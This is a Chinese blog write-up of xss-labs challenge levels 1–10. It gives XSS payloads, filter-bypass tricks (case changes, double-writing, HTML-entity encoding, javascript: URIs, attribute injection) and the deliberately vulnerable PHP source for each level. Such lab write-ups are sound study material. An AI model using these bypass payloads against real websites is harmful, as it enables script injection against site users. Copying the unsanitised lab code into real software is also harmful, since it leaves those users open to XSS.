XSS挑战之旅1-10关

已于 2022-11-15 20:37:42 修改
阅读量1.5k 收藏 7
点赞数
分类专栏: web安全 文章标签: xss php web安全
于 2022-11-15 14:37:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52116519/article/details/127864598
版权

文章目录

前言

漏洞介绍:XSS漏洞
参考文章:XSS挑战之旅
游戏规则:触发alert()弹窗,进入下一关

第1关

  1. 进入第一关
    在这里插入图片描述

  2. 随便输入一下,观测输出,看源代码
    在这里插入图片描述

  3. 输入<script>alert(1)</script>语句进行测试,触发弹窗,进入第二关
    在这里插入图片描述

  4. 源码

    <!DOCTYPE html><!--STATUS OK--><html>
	<head>
		<meta http-equiv="content-type" content="text/html;charset=utf-8">
		<script>
			window.alert = function()  //触发alert(),进入下一关
			{     
				confirm("完成的不错!");
				 window.location.href="level2.php?keyword=test"; 
			}
		</script>
		<title>欢迎来到level1</title>
	</head>
	<body>
		<h1 align=center>欢迎来到level1</h1>
			<?php 
				ini_set("display_errors", 0);
				$str = $_GET["name"];
				echo "<h2 align=center>欢迎用户".$str."</h2>"; //直接对传入的参数进行输出,没有过滤
			?>
			<center><img src=level1.png></center>
			<?php 
				echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
			?>
	</body>
</html>

  5. 分析浏览器加载的结果

    	1 ------------------------------------------------
	$str=<script>alert(1)</script>
	<h2 align=center>欢迎用户".$str."</h2>
	
	2 ------------------------------------------------
	<h2 align=center>欢迎用户<script>alert(1)</script></h2>
	
	3 ------------------------------------------------
	<h2 align=center>欢迎用户
		<script>
			alert(1) //触发alert()函数
		</script>
	</h2>
第2关

  1. 输入<script>alert(1)</script>语句进行测试
    在这里插入图片描述

  2. 查看网页源代码
    在这里插入图片描述

  3. 补充:htmlspecialchars($str)
    在这里插入图片描述

  4. 分析浏览器加载的结果

    <input name=keyword  value="<script>alert(1)</script>">     //这里的<script>alert(1)</script>是字符串
<input name=keyword  value="11111">"<script>alert(1)</script>">   //闭合引号,这里的<script>alert(1)</script>可以被浏览器加载
------------------------------------------------
<input name=keyword  value="11111">
"
<script>
	alert(1)
</script>
">

  5. 进入下一关
    在这里插入图片描述

  6. 源代码

    <?php 
	ini_set("display_errors", 0);
	$str = $_GET["keyword"];
	echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
		<form action=level2.php method=GET>
		<input name=keyword  value="'.$str.'">   //闭合value值
		<input type=submit name=submit value="搜索"/>
		</form>
	</center>';
?>
第3关

  1. 输入<script>alert(1)</script>语句进行测试
    在这里插入图片描述

  2. 测试,看效果修改
    在这里插入图片描述

  3. payload

    <input name=keyword  value='11111' onclick='alert(1)'>

    在这里插入图片描述

  4. 下一关
    在这里插入图片描述

  5. 源码

    <?php 
	ini_set("display_errors", 0);
	$str = $_GET["keyword"];
	echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
	<form action=level3.php method=GET>
	<input name=keyword  value='".htmlspecialchars($str)."'>  //转义了再拼接进去
	<input type=submit name=submit value=搜索 />
	</form>
	</center>";
?>
第4关

  1. 输入<script>alert(1)</script>语句进行测试
    在这里插入图片描述

  2. 继续测试11111' onclick='alert(1)
    在这里插入图片描述

  3. 测试11111" onclick="alert(1)
    在这里插入图片描述

  4. 下一关
    在这里插入图片描述

  5. 源码

    <?php 
	ini_set("display_errors", 0);
	$str = $_GET["keyword"];
	$str2=str_replace(">","",$str); //替换了< >
	$str3=str_replace("<","",$str2);
	echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
			<form action=level4.php method=GET>
			<input name=keyword  value="'.$str3.'">
			<input type=submit name=submit value=搜索 />
			</form>
			</center>';
?>
第5关

  1. 输入<script>alert(1)</script>语句进行测试
    在这里插入图片描述

  2. 测试
    在这里插入图片描述

  3. 测试

    <input name=keyword  value="11"><a href="javascript:alert(1)">123</a>">

    在这里插入图片描述

  4. 浏览器加载效果 在这里插入图片描述

  5. 源码

    <?php 
	ini_set("display_errors", 0);
	$str = strtolower($_GET["keyword"]);  //不能用大写过滤
	$str2=str_replace("<script","<scr_ipt",$str); //过滤了script
	$str3=str_replace("on","o_n",$str2);  //过滤了on
	echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
		<form action=level5.php method=GET>
		<input name=keyword  value="'.$str3.'">
		<input type=submit name=submit value=搜索 />
		</form>
		</center>';
?>
第6关

  1. 大写绕过
    在这里插入图片描述

  2. 源码

    <?php 
	ini_set("display_errors", 0);
	$str = $_GET["keyword"];
	//过滤下面这些关键字,可以用大写绕过
	$str2=str_replace("<script","<scr_ipt",$str); 
	$str3=str_replace("on","o_n",$str2);
	$str4=str_replace("src","sr_c",$str3);
	$str5=str_replace("data","da_ta",$str4);
	$str6=str_replace("href","hr_ef",$str5);
	//对< >转义了
	echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
		<form action=level6.php method=GET>
		<input name=keyword  value="'.$str6.'">
		<input type=submit name=submit value=搜索 />
		</form>
		</center>';
?>
第7关

  1. 测试
    在这里插入图片描述

  2. 测试绕过
    在这里插入图片描述
    在这里插入图片描述

  3. 双写绕过在这里插入图片描述

第8关

  1. 测试
    在这里插入图片描述

  2. 将script用实体编号绕过
    在这里插入图片描述

    <a href="javascript:alert(1)">友情链接</a>
html编码
<a href="java&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert(1)">友情链接</a>

  3. 下一关
    在这里插入图片描述

  4. 源码

    <?php 
	ini_set("display_errors", 0);
	$str = strtolower($_GET["keyword"]);  //过滤大写
	$str2=str_replace("script","scr_ipt",$str);  //过滤这些关键字
	$str3=str_replace("on","o_n",$str2);
	$str4=str_replace("src","sr_c",$str3);
	$str5=str_replace("data","da_ta",$str4);
	$str6=str_replace("href","hr_ef",$str5);
	$str7=str_replace('"','&quot',$str6);  //过滤 "
	echo '<center>
	<form action=level8.php method=GET>
	<input name=keyword  value="'.htmlspecialchars($str).'">   //过滤< > 
	<input type=submit name=submit value=添加友情链接 />
	</form>
	</center>';
?>
<?php
 	echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';  //利用点,绕过上面的限制即可
?>
第9关

  1. html的注释符号//

  2. 源码

    <?php 
	ini_set("display_errors", 0);
	$str = strtolower($_GET["keyword"]);
	......
	//和上一题一样
	......
?>
<?php
	if(false===strpos($str7,'http://')) //如果str7没有http://则返回false
	{
	  echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';
	        }
	else
	{
	  echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
	}
?>

  3. 测试
    在这里插入图片描述

  4. payload

    <a href="java&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert(1)//http://">友情链接</a>

    在这里插入图片描述

第10关

  1. 页面
    在这里插入图片描述

  2. 测试在这里插入图片描述

  3. 过滤了<>
    在这里插入图片描述

  4. 测试

    <input name="t_sort"  value="1111" onclick="alert(1)" type="hidden">

    在这里插入图片描述

  5. payload

    <input name="t_sort"  value="1111" onclick="alert(1)" type="text" type="hidden">
利用HTML语言的解析顺序,使得type="text"

    在这里插入图片描述

  6. 源码

    <?php 
	ini_set("display_errors", 0);
	$str = $_GET["keyword"];  //传入参数
	$str11 = $_GET["t_sort"];
	$str22=str_replace(">","",$str11);  //过滤< >
	$str33=str_replace("<","",$str22);
	echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
	<form id=search>
	<input name="t_link"  value="'.'" type="hidden">
	<input name="t_history"  value="'.'" type="hidden">
	<input name="t_sort"  value="'.$str33.'" type="hidden">  //注入点
	</form>
	</center>';
?>
c4fx
关注
专栏目录
xss-challenge(挑战之旅1~13)
weixin_55404107的博客
10-21 374
好。
XSS挑战之旅练习1-13
m0_53223419的博客
03-16 302
使用docker搭建靶场。
xss挑战之旅
梦里明明有六趣,觉后空空无大千
01-20 505
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
XSS挑战之旅
weixin_41182861的博客
09-26 2059
level-1 在“name=”后面写什么,网页就显示什么。 *查看源码,发现写入的数据在<>标签的外面,那么name的值直接换成JS: <script>alert(1)</script> <svg/onload=alert(1)> <script>confirm(1)</script> <script>prompt(1)</script> level-2 此处为搜索型的xss,分析代码,使用的是get
靶场通-XSS挑战之旅(1-5)
m0_56634355的博客
06-04 1464
直接使用在线靶场网址:https://xss.angelo.org.cn本地搭建xss靶场,这个简单百度吧点击图片后,进入下图:我们可以看到用于js弹窗的代码顺利执行了 看看源码,分析一下 接下来去服务器端看看这一的源码......
XSS挑战之旅[全20]上
ldkpolite007的博客
05-06 2623
Contents 0x01 0x02 0x03 0x04 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,Markdown 将代码片显示选择的高亮样式
xss challenges闯 1-10
夜思红尘的博客
04-12 487
xss challenges闯 1-10
xss labs 挑战之旅
lemonwei
06-05 795
没事重新从xss的源码分析一下形成和利用 xss挑战之旅进入一,发现url中有一个参数name可控;测试测试一下,弹窗成功,在xss中拥有同样弹窗效果的函数alert,还有prompt,以及confirm和prompt 查看原码发现对输出没有进行过滤,直接get参数输出 查看原码发现对输出没有进行过滤,直接get参数输出 2. 第二进入,看到输入发现没回应,查看原码被转义了尝试构造闭合payload 打开源码发现一处被htmlspecialchars($str)转义另一处没有转义 3. 进入
xss挑战
11-09
这个是XSS文件,解压后放在服务器的对应文件夹即可。 闯笔记我博客中有记录,新手可以参考。 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。
XSS挑战之旅10-18)
老司机开代码的博客
08-31 677
文章目录第十第十一第十二第十三第十四第十五第十六第十七第十八 第十 构造url提交 level10.php?keyword=<script>alert(1)</script> 首先ctrl+U看一下页面源码: <h1 align=center>欢迎来到level10</h1> <h2 align=center>没有找到和&lt;script&gt;alert(1)&lt;/script&gt;相
安全学习之XSS——XSS挑战之旅
Jason_TBWH的博客
01-14 935
今天算是假期学习的第一天吧,回顾了一下暑假的学习过程,觉得有必要在xss和sql注入这里重点加强一下,相应的也包括JS,php,sql语言的跟进学习。 学习过程大致是,看书,看视频,练习,总结。 寒假还有好多事要做,每天的学习尽量提高点效率。少睡觉,少打游戏,想想自己的未来。 XSS这块其实内容很多,花样也很多,可浅可深,目前我打算通过靶场练习一下基本功,就当做玩了。 靶场链接:http://xs...
XSS挑战
weixin_34417200的博客
05-15 234
XSS跨站*** 本文参考公众号07v8论安全 XSS***全称跨站脚本***,XSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。 XSS***分成两类1、一类是来自内部的***,主要指的是利用程序自身的漏洞,构造跨站语句。2、另一类则是来自外部的***,主要指的自己构造XSS跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页...
XSS-10注入靶场闯(小游戏)——第十
qq_39330735的博客
02-04 404
XSS-game-10隐藏入口注入,需要在源代码查找到入口的html标签,然后修改对应的属性让其显示出来。然后再注入payload
XSS挑战之旅Level(1-5)
m0_52701599的博客
03-10 454
XSS挑战之旅Level(1-7)详细步骤
xss游戏
Long_gone的博客
09-28 745
欢迎来到level 1 这一没有过滤,所以只要知道使用的是什么闭合,然后使用基本的 欢迎来到level3 本过滤了 " 和 > ,所以不能在使用这一和上一也差不多,也是由 ’ 变为 " 就好; 参考payload: 欢迎来到level5 本它把on给过滤成o_n 同时大小写也被过滤了,由于有标签 所以在这里不能使用 欢迎来到level6 这一相对比较简单,他只是把on给过滤了...
XSS学习-XSS挑战之旅(二)
Lemon's blog
07-24 580
前言:之前打XSS平台时,打到了第11就没有继续了,现在有空了就继续打咯,再增加点XSS的知识。 第十一
xss-labs靶场一到十
最新发布
zxcvbnm123456x的博客
06-26 854
xss的靶场地址为:http://test.ctf8.com/需要先打开phpstudy才能进行练习。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值